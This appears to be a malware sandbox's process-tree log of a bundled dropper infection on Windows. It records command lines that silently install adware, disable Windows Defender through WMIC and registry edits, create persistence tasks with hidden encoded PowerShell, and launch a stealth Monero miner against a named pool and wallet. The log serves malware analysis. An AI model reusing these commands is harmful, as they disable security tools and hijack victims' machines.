C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:110⤵PID:1904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:110⤵PID:1388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3940 /prefetch:110⤵PID:4236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:110⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:810⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 /prefetch:810⤵PID:1672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:110⤵PID:5620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:110⤵PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:110⤵PID:5376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:110⤵PID:6112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5744 /prefetch:210⤵PID:3020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:110⤵PID:11324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:110⤵PID:12080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:110⤵PID:12540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:110⤵PID:12576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:110⤵PID:12844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5072 /prefetch:110⤵PID:12904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:110⤵PID:13236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:110⤵PID:16016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,5934571379182490731,4183026970566214966,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:110⤵PID:16676
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:15644
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd50246f8,0x7fffd5024708,0x7fffd502471810⤵PID:15748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3f-667b0-863-e399b-fdcd9ca876075\Bedavishala.exe"C:\Users\Admin\AppData\Local\Temp\3f-667b0-863-e399b-fdcd9ca876075\Bedavishala.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xh4qkqaz.3gr\LivelyScreenRecJ10.exe & exit9⤵PID:3208
-
C:\Users\Admin\AppData\Local\Temp\xh4qkqaz.3gr\LivelyScreenRecJ10.exeC:\Users\Admin\AppData\Local\Temp\xh4qkqaz.3gr\LivelyScreenRecJ10.exe10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\tmp5394_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp5394_tmp.exe"11⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\tmp5394_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp5394_tmp.exe12⤵
- Executes dropped EXE
PID:5300
-
-
C:\Users\Admin\AppData\Local\Temp\tmp5394_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp5394_tmp.exe12⤵PID:4252
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w20vjelf.2ua\GcleanerEU.exe /eufive & exit9⤵PID:1416
-
C:\Users\Admin\AppData\Local\Temp\w20vjelf.2ua\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\w20vjelf.2ua\GcleanerEU.exe /eufive10⤵PID:5292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 28411⤵
- Program crash
- Enumerates system info in registry
PID:2480
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cmbczyjx.iaa\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\cmbczyjx.iaa\installer.exeC:\Users\Admin\AppData\Local\Temp\cmbczyjx.iaa\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4764 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cmbczyjx.iaa\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cmbczyjx.iaa\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631278838 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
PID:2316
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbxpd5vs.khq\SmartPDF.exe & exit9⤵PID:3152
-
C:\Users\Admin\AppData\Local\Temp\xbxpd5vs.khq\SmartPDF.exeC:\Users\Admin\AppData\Local\Temp\xbxpd5vs.khq\SmartPDF.exe10⤵
- Executes dropped EXE
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\is-DNH9P.tmp\SmartPDF.tmp"C:\Users\Admin\AppData\Local\Temp\is-DNH9P.tmp\SmartPDF.tmp" /SL5="$503B2,138429,56832,C:\Users\Admin\AppData\Local\Temp\xbxpd5vs.khq\SmartPDF.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1364 -
C:\Users\Admin\AppData\Local\Temp\is-EEOA1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EEOA1.tmp\Setup.exe" /Verysilent12⤵PID:3820
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent13⤵PID:5540
-
C:\Users\Admin\AppData\Local\Temp\is-VU46Q.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-VU46Q.tmp\stats.tmp" /SL5="$3043E,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5208 -
C:\Users\Admin\AppData\Local\Temp\is-2PRVK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2PRVK.tmp\Setup.exe" /Verysilent15⤵PID:4988
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit16⤵PID:6320
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'17⤵
- Creates scheduled task(s)
PID:6700
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"16⤵PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"16⤵PID:5020
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit17⤵PID:2020
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'18⤵
- Creates scheduled task(s)
PID:8468
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"17⤵PID:2280
-
-
C:\Windows\System32\conhost.exeC:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth17⤵PID:8640
-
-
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"13⤵
- Executes dropped EXE
- Modifies registry class
PID:4152 -
C:\Users\Admin\AppData\Local\Temp\Live2.exe"C:\Users\Admin\AppData\Local\Temp\Live2.exe"14⤵PID:5476
-
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"14⤵
- Modifies registry class
PID:10164 -
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a15⤵PID:3552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Suspicious use of SetThreadContext
PID:7732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"14⤵PID:5384
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lxkdqa3l.tcm\anyname.exe & exit9⤵PID:804
-
C:\Users\Admin\AppData\Local\Temp\lxkdqa3l.tcm\anyname.exeC:\Users\Admin\AppData\Local\Temp\lxkdqa3l.tcm\anyname.exe10⤵PID:5900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4zlwmaiu.ewz\BsInstFile.exe & exit9⤵PID:5052
-
C:\Users\Admin\AppData\Local\Temp\4zlwmaiu.ewz\BsInstFile.exeC:\Users\Admin\AppData\Local\Temp\4zlwmaiu.ewz\BsInstFile.exe10⤵
- Executes dropped EXE
PID:1932 -
C:\ProgramData\814105.exe"C:\ProgramData\814105.exe"11⤵PID:3696
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3696 -s 211212⤵
- Program crash
- Enumerates system info in registry
PID:2392
-
-
-
C:\ProgramData\7792766.exe"C:\ProgramData\7792766.exe"11⤵
- Suspicious behavior: SetClipboardViewer
PID:1700
-
-
C:\ProgramData\6589475.exe"C:\ProgramData\6589475.exe"11⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5500
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1dlecgfk.t3k\install.exe & exit9⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\1dlecgfk.t3k\install.exeC:\Users\Admin\AppData\Local\Temp\1dlecgfk.t3k\install.exe10⤵PID:2124
-
C:\Users\Admin\AppData\Local\Temp\7zS7862.tmp\SimplInst.exe.\SimplInst.exe11⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\7zS7DC1.tmp\SimplInst.exe.\SimplInst.exe /S /site_id "216660"12⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
PID:6128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &13⤵PID:2988
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"14⤵PID:6420
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:6708
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:7524
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:964
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"14⤵PID:9032
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:4856
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:7636
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:2248
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"14⤵PID:5732
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Checks processor information in registry
PID:8276 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:7404
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True17⤵
- Loads dropped DLL
PID:5196
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"14⤵PID:1812
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵PID:3884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵PID:10132
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True17⤵PID:11668
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"13⤵PID:8572
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&14⤵PID:804
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3215⤵PID:8828
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6415⤵PID:3836
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"13⤵PID:7380
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&14⤵PID:9148
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3215⤵PID:6700
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6415⤵PID:1848
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMGEsZdlH" /SC once /ST 03:09:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="13⤵
- Creates scheduled task(s)
PID:9140 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:4148
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCQQUSYoXLKlZTQVFm" /SC once /ST 06:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JxJEfMIzPUZaCVKzU\WcEadxDpHtEHjlL\ZwRgoJy.exe\" 8e /site_id 216660 /S" /V1 /F13⤵
- Creates scheduled task(s)
PID:8848
-
-
-
-
-
-
